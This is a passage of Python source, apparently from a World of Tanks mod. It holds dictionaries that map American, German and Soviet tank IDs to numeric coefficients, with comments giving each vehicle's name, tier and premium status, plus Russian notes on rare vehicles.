lvl:3 coeff:1.1 '1611977094' : 6474567600, # 4641 usa_A17_M37 lvl:4 coeff:1.08 '6502439814' : 6594467000, # 18721 usa_A27_T82 lvl:4 coeff:1.1 '1434142086' : 7014114900, # 4129 usa_A18_M41 lvl:5 coeff:1.17 '5702182278' : 6114869400, # 16417 usa_A87_M44 lvl:6 coeff:1.02 '2767904646' : 4975825100, # 7969 usa_A32_M12 lvl:7 coeff:0.83 '2590069638' : 4196479000, # 7457 usa_A37_M40M43 lvl:8 coeff:0.7 '5613264774' : 4136529300, # 16161 usa_A88_M53_55 lvl:9 coeff:0.69 '2945739654' : 4795976000, # 8481 usa_A38_T92 lvl:10 coeff:0.8 # lightTank # '20017900422': None, #57633 usa_A112_T71E2 lvl:7 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=57633 #T71 CMCD P, только КИТАЙ # mediumTank # '19395477894': None, #55841 usa_A95_T95_E6 lvl:10 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=55841 # T95E6 за глобалку # heavyTank # '21351662982': None, #61473 usa_A126_PzVI_Tiger_II_capt lvl:7 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=61473 #King Tiger (захваченный), TwichPrime # '20640322950': None, #59425 usa_A13_T34_hvy_BF lvl:8 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=59425 #T34 Черный # '20907075462': None, #60193 usa_A115_Chrysler_K lvl:8 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=60193 #Chrysler K # '21529497990': None, #61985 usa_A124_T54E2 lvl:8 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=61985 #M54 Renegade }) self.p__COEFFICIENTS.update({ # germany # lightTank '1072914726' : 7859405670, # 3089 germany_G12_Ltraktor lvl:1 coeff:1.311 '717244710' : 6535716294, # 2065 germany_G06_PzII lvl:2 coeff:1.0902 '272657190' : 6552502210, # 785 germany_G07_Pz35t lvl:2 coeff:1.093 '18233992998': 5994970000, # 52497 germany_G33_H39_captured lvl:2 coeff:1.0 !!!!PREMIUM '20990435622': 7193964000, # 60433 germany_G108_PzKpfwII_AusfD lvl:2 coeff:1.2 !!!!PREMIUM '4451779878' : 7493712500, # 12817 germany_G53_PzI lvl:2 coeff:1.25 '16544560422': 7193964000, # 47633 germany_G139_MKA lvl:2 coeff:1.2 !!!!PREMIUM '1695337254' : 6504542450, # 4881 germany_G102_Pz_III lvl:3 coeff:1.085 '4362862374' : 5994970000, # 12561 germany_G63_PzI_ausf_C lvl:3 coeff:1.0 '1161832230' : 5917035390, # 3345 germany_G08_Pz38t lvl:3 coeff:0.987 '17967240486': 7193964000, # 51729 germany_G36_PzII_J lvl:3 coeff:1.2 !!!!PREMIUM '4540697382' : 5994970000, # 13073 germany_G82_Pz_II_AusfG lvl:3 coeff:1.0 '19034250534': 8992455000, # 54801 germany_G50_T-15 lvl:3 coeff:1.5 !!!!PREMIUM '22057445670': 7791662509, # 63505 germany_G117_Toldi_III lvl:3 coeff:1.2997 !!!!PREMIUM '2851264806' : 6312703410, # 8209 germany_G52_Pz38_NA lvl:4 coeff:1.053 '2139924774' : 6294718500, # 6161 germany_G25_PzII_Luchs lvl:4 coeff:1.05 '1873172262' : 6114869400, # 5393 germany_G26_VK1602 lvl:5 coeff:1.02 '3473687334' : 4945850250, # 10001 germany_G66_VK2801 lvl:6 coeff:0.825 '6585799974' : 4676076600, # 18961 germany_G113_SP_I_C lvl:7 coeff:0.78 '4985284902' : 8392958000, # 14353 germany_G85_Auf_Panther lvl:7 coeff:1.4 '7030387494' : 4076579600, # 20241 germany_G126_HWK_12 lvl:8 coeff:0.68 '22235280678': 8392958000, # 64017 germany_G120_M41_90 lvl:8 coeff:1.4 !!!!PREMIUM '17700487974': 8392958000, # 50961 germany_G120_M41_90_GrandFinal lvl:8 coeff:1.4 !!!!PREMIUM '16455642918': 8992455000, # 47377 germany_G140_HWK_30 lvl:8 coeff:1.5 !!!!PREMIUM '6407964966' : 4016629900, # 18449 germany_G103_RU_251 lvl:9 coeff:0.67 '6941469990' : 3956680200, # 19985 germany_G125_Spz_57_Rh lvl:10 coeff:0.66 # mediumTank '18056157990': 7553662200, # 51985 germany_G34_S35_captured lvl:3 coeff:1.26 !!!!PREMIUM '20723683110': 7313863400, # 59665 germany_G100_Gtraktor_Krupp lvl:3 coeff:1.22 !!!!PREMIUM '5963377446' : 5994970000, # 17169 germany_G83_Pz_IV_AusfA lvl:3 coeff:1.0 '4718532390' : 6594467000, # 13585 germany_G86_VK2001DB lvl:4 coeff:1.1 '1517502246' : 6768321130, # 4369 germany_G10_PzIII_AusfJ lvl:4 coeff:1.129 '6052294950' : 6294718500, # 17425 germany_G80_Pz_IV_AusfD lvl:4 coeff:1.05 '17878322982': 8872555600, # 51473 germany_G32_PzV_PzIV lvl:5 coeff:1.48 !!!!PREMIUM '18945333030': 9112354400, # 54545 germany_G46_T-25 lvl:5 coeff:1.52 !!!!PREMIUM '2228842278' : 7002124960, # 6417 germany_G28_PzIII_IV lvl:5 coeff:1.168 '19123168038': 8392958000, # 55057 germany_G70_PzIV_Hydro lvl:5 coeff:1.4 !!!!PREMIUM '6319047462' : 6594467000, # 18193 germany_G81_Pz_IV_AusfH lvl:5 coeff:1.1 '21346105638': 8392958000, # 61457 germany_G107_PzKpfwIII_AusfK lvl:5 coeff:1.4 !!!!PREMIUM '21968528166': 8392358503, # 63249 germany_G116_Turan_III_prot lvl:5 coeff:1.3999 !!!!PREMIUM '19923425574': 7553662200, # 57361 germany_G77_PzIV_Schmalturm lvl:6 coeff:1.26 !!!!PREMIUM '4896367398' : 5395473000, # 14097 germany_G87_VK3002DB_V1 lvl:6 coeff:0.9 '2495594790' : 6102879460, # 7185 germany_G27_VK3001P lvl:6 coeff:1.018 '5518789926' : 5095724500, # 15889 germany_G96_VK3002M lvl:6 coeff:0.85 '20012343078': 9352153200, # 57617 germany_G78_Panther_M10 lvl:7 coeff:1.56 !!!!PREMIUM '1428584742' : 4550182230, # 4113 germany_G24_VK3002DB lvl:7 coeff:0.759 '450492198' : 4825950850, # 1297 germany_G03_PzV_Panther lvl:7 coeff:0.805 '2940182310' : 4742021270, # 8465 germany_G64_Panther_II lvl:8 coeff:0.791 '20901518118': 8992455000, # 60177 germany_G106_PzKpfwPanther_AusfF lvl:8 coeff:1.5 !!!!PREMIUM '22324198182': 8992455000, # 64273 germany_G119_Pz58_Mutz lvl:8 coeff:1.5 !!!!PREMIUM '22146363174': 5994970000, # 63761 germany_G119_Panzer58 lvl:8 coeff:1.0 !!!!PREMIUM '4807449894' : 4016629900, # 13841 germany_G88_Indien_Panzer lvl:8 coeff:0.67 '3562604838' : 4670081630, # 10257 germany_G54_E-50 lvl:9 coeff:0.779 '5163119910' : 4496227500, # 14865 germany_G91_Pro_Ag_A lvl:9 coeff:0.75 '21168270630': 4795976000, # 60945 germany_G105_T-55_NVA_DDR lvl:9 coeff:0.8 !!!!PREMIUM '5074202406' : 4496227500, # 14609 germany_G89_Leopard1 lvl:10 coeff:0.75 '4273944870' : 4376328100, # 12305 germany_G73_E50_Ausf_M lvl:10 coeff:0.73 # heavyTank '18145075494': 8153159200, # 52241 germany_G35_B-1bis_captured lvl:4 coeff:1.36 !!!!PREMIUM '4629614886' : 6294718500, # 13329 germany_G90_DW_II lvl:4 coeff:1.05 '895079718' : 6594467000, # 2577 germany_G13_VK3001H lvl:5 coeff:1.1 '20634765606': 8392958000, # 59409 germany_G122_VK6501H lvl:5 coeff:1.4 !!!!PREMIUM '17078065446': 7193964000, # 49169 germany_G136_Tiger_131 lvl:6 coeff:1.2 !!!!PREMIUM '806162214' : 5581317070, # 2321 germany_G15_VK3601H lvl:6 coeff:0.931 '18322910502': 7193964000, # 52753 germany_G137_PzVI_Tiger_217 lvl:6 coeff:1.2 !!!!PREMIUM '183739686' : 5401467970, # 529 germany_G04_PzVI_Tiger_I lvl:7 coeff:0.901 '21879610662': 8992455000, # 62993 germany_G118_VK4503 lvl:7 coeff:1.5 !!!!PREMIUM '3740439846' : 4819955880, # 10769 germany_G57_PzVI_Tiger_P lvl:7 coeff:0.804 '3651522342' : 5347513240, # 10513 germany_G67_VK4502A lvl:8 coeff:0.892 '6852552486' : 4975825100, # 19729 germany_G115_Typ_205B lvl:8 coeff:0.83 '18856415526': 9891700500, # 54289 germany_G51_Lowe lvl:8 coeff:1.65 !!!!PREMIUM '1784254758' : 5119704380, # 5137 germany_G16_PzVIB_Tiger_II lvl:8 coeff:0.854 '16989147942': 8992455000, # 48913 germany_G138_VK168_02 lvl:8 coeff:1.5 !!!!PREMIUM '16722395430': 8992455000, # 48145 germany_G138_VK168_02_Mauerbrecher lvl:8 coeff:1.5 !!!!PREMIUM '19478838054': 8992455000, # 56081 germany_G141_VK7501K lvl:8 coeff:1.5 !!!!PREMIUM '16277807910': 8992455000, # 46865 germany_G143_E75_TS lvl:8 coeff:1.5 !!!!PREMIUM '6496882470' : 4556177200, # 18705 germany_G110_Typ_205 lvl:9 coeff:0.76 '2584512294' : 4724036360, # 7441 germany_G58_VK4502P lvl:9 coeff:0.788 '3384769830' : 4514212410, # 9745 germany_G55_E-75 lvl:9 coeff:0.753 '2406677286' : 5035774800, # 6929 germany_G42_Maus lvl:10 coeff:0.84 '3295852326' : 4580157080, # 9489 germany_G56_E-100 lvl:10 coeff:0.764 '6763634982' : 4376328100, # 19473 germany_G134_PzKpfw_VII lvl:10 coeff:0.73 '20368013094': 4376328100, # 58641 germany_G92_VK7201 lvl:10 coeff:0.73 !!!!PREMIUM # AT-SPG '1250749734' : 5917035390, # 3601 germany_G21_PanzerJager_I lvl:2 coeff:0.987 '2317759782' : 5485397550, # 6673 germany_G20_Marder_II lvl:3 coeff:0.915 '6230129958' : 5095724500, # 17937 germany_G101_StuG_III lvl:4 coeff:0.85 '3918274854' : 5095724500, # 11281 germany_G39_Marder_III lvl:4 coeff:0.85 '628327206' : 5470410125, # 1809 germany_G09_Hetzer lvl:4 coeff:0.9125 '361574694' : 6021347868, # 1041 germany_G05_StuG_40_AusfG lvl:5 coeff:1.0044 '21079353126': 8992455000, # 60689 germany_G104_Stug_IV lvl:5 coeff:1.5 !!!!PREMIUM '5607707430' : 5695221500, # 16145 germany_G76_Pz_Sfl_IVc lvl:5 coeff:0.95 '19834508070': 8093209500, # 57105 germany_G41_DickerMax lvl:6 coeff:1.35 !!!!PREMIUM '539409702' : 5875070600, # 1553 germany_G17_JagdPzIV lvl:6 coeff:0.98 '4096109862' : 5695221500, # 11793 germany_G40_Nashorn lvl:6 coeff:0.95 '3829357350' : 4496227500, # 11025 germany_G43_Sturer_Emil lvl:7 coeff:0.75 '21435023142': 7793461000, # 61713 germany_G109_Steyr_WT lvl:7 coeff:1.3 !!!!PREMIUM '1339667238' : 4945850250, # 3857 germany_G18_JagdPanther lvl:7 coeff:0.825 '19301003046': 7793461000, # 55569 germany_G48_E-25 lvl:7 coeff:1.3 !!!!PREMIUM '17433735462': 8992455000, # 50193 germany_G114_Rheinmetall_Skorpian lvl:8 coeff:1.5 !!!!PREMIUM '21701775654': 8992455000, # 62481 germany_G114_Skorpian lvl:8 coeff:1.5 !!!!PREMIUM '16811312934': 8992455000, # 48401 germany_G112_KanonenJagdPanzer_105 lvl:8 coeff:1.5 !!!!PREMIUM '4007192358' : 4346353250, # 11537 germany_G71_JagdPantherII lvl:8 coeff:0.725 '5785542438' : 4316378400, # 16657 germany_G99_RhB_Waffentrager lvl:8 coeff:0.72 '19212085542': 9292203500, # 55313 germany_G65_JagdTiger_SdKfz_185 lvl:8 coeff:1.55 !!!!PREMIUM '21523940646': 8992455000, # 61969 germany_G112_KanonenJagdPanzer lvl:8 coeff:1.5 !!!!PREMIUM '2673429798' : 4346353250, # 7697 germany_G37_Ferdinand lvl:8 coeff:0.725 '5696624934' : 4196479000, # 16401 germany_G97_Waffentrager_IV lvl:9 coeff:0.7 '2762347302' : 4076579600, # 7953 germany_G44_JagdTiger lvl:9 coeff:0.68 '5874459942' : 3596982000, # 16913 germany_G98_Waffentrager_E100 lvl:10 coeff:0.6 '4185027366' : 3950685230, # 12049 germany_G72_JagdPz_E100 lvl:10 coeff:0.659 '6674717478' : 3596982000, # 19217 germany_G121_Grille_15_L63 lvl:10 coeff:0.6 # SPG '5252037414' : 7973310100, # 15121 germany_G93_GW_Mk_VIe lvl:2 coeff:1.33 '983997222' : 7074064600, # 2833 germany_G11_Bison_I lvl:3 coeff:1.18 '2051007270' : 6474567600, # 5905 germany_G19_Wespe lvl:3 coeff:1.08 '1606419750' : 7074064600, # 4625 germany_G22_Sturmpanzer_II lvl:4 coeff:1.18 '5429872422' : 6174819100, # 15633 germany_G95_Pz_Sfl_IVb lvl:4 coeff:1.03 '1962089766' : 6714366400, # 5649 germany_G23_Grille lvl:5 coeff:1.12 '94822182' : 7014114900, # 273 germany_G02_Hummel lvl:6 coeff:1.17 '3118017318' : 5095724500, # 8977 germany_G49_G_Panther lvl:7 coeff:0.85 '5340954918' : 4676076600, # 15377 germany_G94_GW_Tiger_P lvl:8 coeff:0.78 '3029099814' : 4196479000, # 8721 germany_G45_G_Tiger lvl:9 coeff:0.7 '3206934822' : 4915875400, # 9233 germany_G61_G_E lvl:10 coeff:0.82 # lightTank # '16633477926': None, #47889 germany_G85_Aufklarungspanzer_V lvl:8 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=47889 #Aufklrungspanzer V, в разработке # mediumTank # '18767498022': None, #54033 germany_G32_PzV_PzIV_ausf_Alfa lvl:5 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=54033 #Pz.Kpfw. V/IV Alpha, Выдавался Альфа тестерам # '16188890406': None, #46609 germany_G142_M48RPz lvl:8 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=46609 #M48A2 Rumpanzer Паттон с ковшом # '17344817958': None, #49937 germany_G119_Panzer58_BF lvl:8 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=49937 #Schwarzpanzer 58 # '16366725414': None, #47121 germany_G144_Kpz_50t lvl:9 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=47121 #Kampfpanzer 50 t, Награда за ранговые бои 2019 # heavyTank # '21612858150': None, #62225 germany_G58_VK4502P7 lvl:7 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=62225 #VK 45.02 (P) Ausf. B7, Этого танка нет ни у кого # '17255900454': None, #49681 germany_G16_PzVIB_Tiger_II_F lvl:7 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=49681 #Tiger II (H), Этого танка нет ни у кого # '21790693158': None, #62737 germany_G115_Typ_205_4_Jun lvl:8 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=62737 #VK 100.01 (P) Ausf. B, только КИТАЙ # AT-SPG # '17166982950': None, #49425 germany_G44_JagdTigerH lvl:8 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=49425 #Jagdtiger (H), Этого танка нет ни у кого # '16900230438': None, #48657 germany_G98_Waffentrager_E100_P lvl:10 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=48657 #Waffentrger auf E 100 (P), только КИТАЙ }) self.p__COEFFICIENTS.update({ # ussr # lightTank '1156274886' : 5503382460, # 3329 ussr_R11_MS-1 lvl:1 coeff:0.918 #changed in 1.9 #fixed '356017350' : 5695221500, # 1025 ussr_R08_BT-2 lvl:2 coeff:0.95 #changed in 1.9 #fixed '14404982982': 10491197500, # 41473 ussr_R86_LTP_bootcamp lvl:2 coeff:1.75 '5335397574' : 4915875400, # 15361 ussr_R42_T-60 lvl:2 coeff:0.82 #changed in 1.9 #fixed '1600862406' : 5347513240, # 4609 ussr_R09_T-26 lvl:2 coeff:0.892 #changed in 1.9 #fixed '18939775686': 6534517300, # 54529 ussr_R84_Tetrarch_LL lvl:2 coeff:1.09 !!!!PREMIUM # '17694930630': None, #50945 ussr_R125_T_45 lvl:2 coeff:0.0 !!!!PREMIUM '1067357382' : 5011794920, # 3073 ussr_R22_T-46 lvl:3 coeff:0.836 #changed in 1.9 #fixed '267099846' : 5845095750, # 769 ussr_R03_BT-7 lvl:4 coeff:0.975 #changed in 1.9 #fixed '18317353158': 9591952000, # 52737 ussr_R67_M3_LL lvl:3 coeff:1.6 !!!!PREMIUM '21162713286': 7793461000, # 60929 ussr_R105_BT_7A lvl:3 coeff:1.3 !!!!PREMIUM '5246480070' : 5095724500, # 15105 ussr_R43_T-70 lvl:3 coeff:0.85 #changed in 1.9 #fixed '18584105670': 7880388065, # 53505 ussr_R56_T-127 lvl:3 coeff:1.3145 !!!!PREMIUM '18139518150': 7793461000, # 52225 ussr_R34_BT-SV lvl:3 coeff:1.3 !!!!PREMIUM # '19651115718': None, #56577 ussr_R86_LTP lvl:3 coeff:0.0 !!!!PREMIUM # '15560910534': None, #44801 ussr_R161_T_116 lvl:3 coeff:0.0 !!!!PREMIUM # '711687366' : 5917035390, # 2049 ussr_R12_A-20 lvl:5 coeff:0.987 #changed in 1.9 #fixed '18228435654': 9442077750, # 52481 ussr_R31_Valentine_LL lvl:4 coeff:1.575 !!!!PREMIUM '5513232582' : 6114869400, # 15873 ussr_R44_T80 lvl:4 coeff:1.02 #changed in 1.9 #fixed '3379212486' : 8392958000, # 9729 ussr_R70_T_50_2 lvl:5 coeff:1.4 '3290294982' : 5779151080, # 9473 ussr_R41_T-50 lvl:5 coeff:0.964 #changed in 1.9 #fixed '5779985094' : 4975825100, # 16641 ussr_R101_MT25 lvl:6 coeff:0.83 #changed in 1.9 #fixed # '15738745542': None, #45313 ussr_R160_T_50_2 lvl:6 coeff:0.0 !!!!PREMIUM #changed in 1.9 #not fixed '6758077638' : 4676076600, # 19457 ussr_R131_Tank_Gavalov lvl:7 coeff:0.78 '15827663046': 8992455000, # 45569 ussr_R158_LT_432 lvl:8 coeff:1.5 !!!!PREMIUM '6402407622' : 4076579600, # 18433 ussr_R107_LTB lvl:8 coeff:0.68 '6313490118' : 4016629900, # 18177 ussr_R109_T54S lvl:9 coeff:0.67 '6669160134' : 3956680200, # 19201 ussr_R132_VNII_100LT lvl:10 coeff:0.66 # mediumTank '16627920582': 7793461000, # 47873 ussr_R143_T_29 lvl:3 coeff:1.3 !!!!PREMIUM '18406270662': 8614771890, # 52993 ussr_R68_A-32 lvl:4 coeff:1.437 !!!!PREMIUM '533852358' : 5976985090, # 1537 ussr_R06_T-28 lvl:4 coeff:0.997 #changed in 1.9 #fixed '21340548294': 9112354400, # 61441 ussr_R118_T28_F30 lvl:4 coeff:1.52 !!!!PREMIUM '347334' : 6558497180, # 1 ussr_R04_T-34 lvl:5 coeff:1.094 #changed in 1.9 #fixed '17872765638': 8992455000, # 51457 ussr_R32_Matilda_II_LL lvl:5 coeff:1.5 !!!!PREMIUM '16361168070': 8692706500, # 47105 ussr_R154_T_34E_1943 lvl:5 coeff:1.45 !!!!PREMIUM '20184620742': 7313863400, # 58113 ussr_R108_T34_85M lvl:6 coeff:1.22 !!!!PREMIUM '4268387526' : 4975825100, # 12289 ussr_R57_A43 lvl:6 coeff:0.83 #changed in 1.9 #fixed '889522374' : 5431442820, # 2561 ussr_R07_T-34-85 lvl:6 coeff:0.906 #changed in 1.9 #fixed '20629208262': 7493712500, # 59393 ussr_R117_T34_85_Rudy lvl:6 coeff:1.25 !!!!PREMIUM # '16716838086': None, #48129 ussr_R140_M4_Loza lvl:6 coeff:0.0 !!!!PREMIUM '19828950726': 7493712500, # 57089 ussr_R98_T44_85 lvl:7 coeff:1.25 !!!!PREMIUM '3112459974' : 5563332160, # 8961 ussr_R46_KV-13 lvl:7 coeff:0.928 '2312202438' : 5143684260, # 6657 ussr_R23_T-43 lvl:7 coeff:0.858 '4357305030' : 4616126900, # 12545 ussr_R59_A44 lvl:7 coeff:0.77 '4624057542' : 4016629900, # 13313 ussr_R60_Object416 lvl:8 coeff:0.67 '16539003078': 8992455000, # 47617 ussr_R146_STG lvl:8 coeff:1.5 !!!!PREMIUM '20807043270': 8992455000, # 59905 ussr_R112_T54_45 lvl:8 coeff:1.5 !!!!PREMIUM '21518383302': 8992455000, # 61953 ussr_R122_T44_100 lvl:8 coeff:1.5 !!!!PREMIUM '16450085574': 8992455000, # 47361 ussr_R146_STG_Tday lvl:8 coeff:1.5 !!!!PREMIUM '16983590598': 8992455000, # 48897 ussr_R122_T44_100B lvl:8 coeff:1.5 !!!!PREMIUM '16094415558': 8992455000, # 46337 ussr_R127_T44_100_U lvl:8 coeff:1.5 !!!!PREMIUM '21874053318': 8992455000, # 62977 ussr_R127_T44_100_P lvl:8 coeff:1.5 !!!!PREMIUM '16005498054': 8992455000, # 46081 ussr_R127_T44_100_K lvl:8 coeff:1.5 !!!!PREMIUM '1511944902' : 4807965940, # 4353 ussr_R20_T-44 lvl:8 coeff:0.802 '6135655110' : 4496227500, # 17665 ussr_R104_Object_430_II lvl:9 coeff:0.75 '2756789958' : 4915875400, # 7937 ussr_R40_T-54 lvl:9 coeff:0.82 '7558335174' : 4376328100, # 21761 ussr_R144_K_91 lvl:10 coeff:0.73 '5957820102' : 4376328100, # 17153 ussr_R96_Object_430B lvl:10 coeff:0.73 '4801892550' : 4676076600, # 13825 ussr_R87_T62A lvl:10 coeff:0.78 '5424315078' : 4376328100, # 15617 ussr_R95_Object_907 lvl:10 coeff:0.73 !!!!PREMIUM # '7469417670': None, #21505 ussr_R96_Object_430 lvl:9 coeff:0.0 '5868902598' : 4915875400, # 16897 ussr_R97_Object_140 lvl:10 coeff:0.82 '6935912646' : 4376328100, # 19969 ussr_R148_Object_430_U lvl:10 coeff:0.73 # heavyTank '6491325126' : 5467412640, # 18689 ussr_R13_KV-1s lvl:6 coeff:0.912 #changed in 1.9 #fixed '18761940678': 8832988798, # 54017 ussr_R38_KV-220 lvl:5 coeff:1.4734 !!!!PREMIUM '17961683142': 9442077750, # 51713 ussr_R33_Churchill_LL lvl:5 coeff:1.575 !!!!PREMIUM '4090552518' : 5994970000, # 11777 ussr_R80_KV1 lvl:5 coeff:1.0 #changed in 1.9 #fixed '3912717510' : 5527362340, # 11265 ussr_R72_T150 lvl:6 coeff:0.922 #changed in 1.9 #fixed '978439878' : 3495067510, # 2817 ussr_R106_KV85 lvl:6 coeff:0.583 #changed in 1.9 #fixed '3645964998' : 5203633960, # 10497 ussr_R77_KV2 lvl:6 coeff:0.868 #changed in 1.9 #fixed # '20895960774': None, #60161 ussr_R114_Object_244 lvl:6 coeff:0.0 !!!!PREMIUM # '22496475846': None, #64769 ussr_R152_KV2_W lvl:6 coeff:0.0 !!!!PREMIUM '17339260614': 8992455000, # 49921 ussr_R133_KV_122 lvl:7 coeff:1.5 !!!!PREMIUM '20540290758': 8093209500, # 59137 ussr_R71_IS_2B lvl:7 coeff:1.35 !!!!PREMIUM '16183333062': 8093209500, # 46593 ussr_R156_IS_2M lvl:7 coeff:1.35 !!!!PREMIUM '178182342' : 5605296950, # 513 ussr_R01_IS lvl:7 coeff:0.935 '2045449926' : 5359503180, # 5889 ussr_R39_KV-3 lvl:7 coeff:0.894 '3201377478' : 8992455000, # 9217 ussr_R61_Object252 lvl:8 coeff:1.5 !!!!PREMIUM '21962970822': 8992455000, # 63233 ussr_R128_KV4_Kreslavskiy lvl:8 coeff:1.5 !!!!PREMIUM '16894673094': 8992455000, # 48641 ussr_R134_Object_252K lvl:8 coeff:1.5 !!!!PREMIUM '17250343110': 8992455000, # 49665 ussr_R134_Object_252U lvl:8 coeff:1.5 !!!!PREMIUM '7113747654' : 4795976000, # 20481 ussr_R139_IS_M lvl:8 coeff:0.8 '20451373254': 8992455000, # 58881 ussr_R113_Object_730 lvl:8 coeff:1.5 !!!!PREMIUM '3823800006' : 5527362340, # 11009 ussr_R73_KV4 lvl:8 coeff:0.922 '1867614918' : 4777991090, # 5377 ussr_R19_IS-3 lvl:8 coeff:0.797 '21785135814': 8992455000, # 62721 ussr_R123_Kirovets_1 lvl:8 coeff:1.5 !!!!PREMIUM '18495188166': 8992455000, # 53249 ussr_R54_KV-5 lvl:8 coeff:1.5 !!!!PREMIUM '20984878278': 8992455000, # 60417 ussr_R115_IS-3_auto lvl:8 coeff:1.5 !!!!PREMIUM '6846995142' : 4616126900, # 19713 ussr_R151_Object_257_2 lvl:9 coeff:0.77 '7202665158' : 4616126900, # 20737 ussr_R153_Object_705 lvl:9 coeff:0.77 '3734882502' : 4532197320, # 10753 ussr_R63_ST_I lvl:9 coeff:0.756 '4001635014' : 4658091690, # 11521 ussr_R81_IS8 lvl:9 coeff:0.777 '2134367430' : 4694061510, # 6145 ussr_R90_IS_4M lvl:10 coeff:0.783 '2490037446' : 4724036360, # 7169 ussr_R45_IS-7 lvl:10 coeff:0.788 '7291582662' : 4376328100, # 20993 ussr_R145_Object_705_A lvl:10 coeff:0.73 '7647252678' : 4376328100, # 22017 ussr_R155_Object_277 lvl:10 coeff:0.73 '20273538246': 4196479000, # 58369 ussr_R110_Object_260 lvl:10 coeff:0.7 !!!!PREMIUM '16272250566': 4196479000, # 46849 ussr_R157_Object_279R lvl:10 coeff:0.7 !!!!PREMIUM # '7914005190': None, #22785 ussr_R170_IS_2_II lvl:8 coeff:0.0 https://premomer.org/tank.php?id=22785 #Двустволка8 '15383075526': 8992455000, # 44289 ussr_R165_Object_703_II lvl:8 coeff:1.5 !!!!PREMIUM # '7825087686': None, #22529 ussr_R171_IS_3_II lvl:9 coeff:0.0 https://premomer.org/tank.php?id=22529 #Двустволка9 # '7736170182': None, #22273 ussr_R169_ST_II lvl:10 coeff:0.0 https://premomer.org/tank.php?id=22273 #Двустволка10 # AT-SPG '1778697414' : 5779151080, # 5121 ussr_R10_AT-1 lvl:2 coeff:0.964 #changed in 1.9 #fixed '14493900486': 10491197500, # 41729 ussr_R50_SU76I_bootcamp lvl:2 coeff:1.75 '18850858182': 7193964000, # 54273 ussr_R50_SU76I lvl:3 coeff:1.2 !!!!PREMIUM '2223284934' : 4766001150, # 6401 ussr_R24_SU-76 lvl:4 coeff:0.795 #changed in 1.9 #fixed '2401119942' : 4340358280, # 6913 ussr_R25_GAZ-74b lvl:4 coeff:0.724 #changed in 1.9 #fixed '18673023174': 7793461000, # 53761 ussr_R78_SU_85I lvl:5 coeff:1.3 !!!!PREMIUM #changed in 1.9 #not fixed '89264838' : 5845095750, # 257 ussr_R02_SU-85 lvl:5 coeff:0.975 #changed in 1.9 #fixed '19028693190': 8572807100, # 54785 ussr_R49_SU100Y lvl:6 coeff:1.43 !!!!PREMIUM '1245192390' : 5119704380, # 3585 ussr_R17_SU-100 lvl:6 coeff:0.854 #changed in 1.9 #fixed '800604870' : 5077739590, # 2305 ussr_R18_SU-152 lvl:7 coeff:0.847 '3557047494' : 4316378400, # 10241 ussr_R74_SU100M1 lvl:7 coeff:0.72 '20718125766': 8093209500, # 59649 ussr_R116_ISU122C_Berlin lvl:7 coeff:1.35 !!!!PREMIUM '19206528198': 8632756800, # 55297 ussr_R89_SU122_44 lvl:7 coeff:1.44 !!!!PREMIUM '3468129990' : 4783986060, # 9985 ussr_R58_SU-101 lvl:8 coeff:0.798 '16805755590': 8992455000, # 48385 ussr_R135_T_103 lvl:8 coeff:1.5 !!!!PREMIUM '20362455750': 5994970000, # 58625 ussr_R111_ISU130 lvl:8 coeff:1.0 !!!!PREMIUM '2578954950' : 4262423670, # 7425 ussr_R47_ISU-152 lvl:8 coeff:0.711 # '15649828038': None, #45057 ussr_R159_SU_130PM lvl:8 coeff:0.0 !!!!PREMIUM '2845707462' : 3716881400, # 8193 ussr_R53_Object_704 lvl:9 coeff:0.62 '4179470022' : 4208468940, # 12033 ussr_R75_SU122_54 lvl:9 coeff:0.702 # '7380500166': None, #21249 ussr_R93_Object263 lvl:9 coeff:0.0 '4979727558' : 3794816010, # 14337 ussr_R93_Object263B lvl:10 coeff:0.633 '7024830150' : 3776831100, # 20225 ussr_R149_Object_268_4 lvl:10 coeff:0.63 '4712975046' : 3626956850, # 13569 ussr_R88_Object268 lvl:10 coeff:0.605 # SPG '1334109894' : 5875070600, # 3841 ussr_R16_SU-18 lvl:2 coeff:0.98 #changed in 1.9 #fixed '2667872454' : 5779151080, # 7681 ussr_R66_SU-26 lvl:3 coeff:0.964 #changed in 1.9 #fixed '1689779910' : 6258748680, # 4865 ussr_R14_SU-5 lvl:4 coeff:1.044 #changed in 1.9 #fixed '5691067590' : 6714366400, # 16385 ussr_R100_SU122A lvl:5 coeff:1.12 #changed in 1.9 #fixed '1956532422' : 5994970000, # 5633 ussr_R26_SU-8 lvl:6 coeff:1.0 #changed in 1.9 #fixed '5602150086' : 5665246650, # 16129 ussr_R91_SU14_1 lvl:7 coeff:0.945 '622769862' : 5605296950, # 1793 ussr_R15_S-51 lvl:7 coeff:0.935 '1423027398' : 4676076600, # 4097 ussr_R27_SU-14 lvl:8 coeff:0.78 '2934624966' : 4076579600, # 8449 ussr_R51_Object_212 lvl:9 coeff:0.68 '3023542470' : 4556177200, # 8705 ussr_R52_Object_261 lvl:10 coeff:0.76 # lightTank # '19917868230': None, #57345 ussr_R98_T44_85M lvl:8 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=57345 #Прошел тесты, но по каким-то причинам выпущен не был # mediumTank # '19740033222': None, #56833 ussr_R99_T44_122 lvl:7 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=56833 #Выдается Супер тестерам # '21073795782': None, #60673 ussr_R95_Object_907A lvl:10 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=60673 #Эксклюзив 100%, только КИТАЙ # '21429465798': None, #61697 ussr_R120_T22SR_A22 lvl:10 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=61697 #Награда за боевые задачи в рамках боёв в режиме 